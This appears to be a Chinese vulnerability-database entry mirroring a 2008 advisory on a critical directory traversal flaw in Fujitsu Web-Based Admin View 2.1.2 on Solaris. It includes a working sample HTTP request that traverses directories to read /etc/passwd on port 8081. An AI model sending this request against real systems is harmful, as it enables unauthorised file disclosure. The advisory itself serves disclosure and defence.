Fujitsu Web-Based Admin View Directory Traversal Vulnerability

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1052544 漏洞类型
发布时间 2008-08-22 更新时间 2008-08-22
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2008080063
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Fujitsu Web-Based Admin View Directory Traversal Vulnerability

 

Version: 2.1.2 on Solaris, Other versions may vulnerable

 

Vulnerability: Directory Traversal

 

Risk: Critical

 

Description:  Due to insufficient control of user inputs, Fujitsu
Web-based admin view reveals content of files residing in folders other
than webroot. This will allow an attacker to view arbitrary local files
within the context of the web server. 

 

Sample Request:

 

GET /.././.././.././.././.././.././.././.././.././etc/passwd HTTP/1.0

Host: target:8081

 

Deniz CEVIK

www.intellectpro.com.tr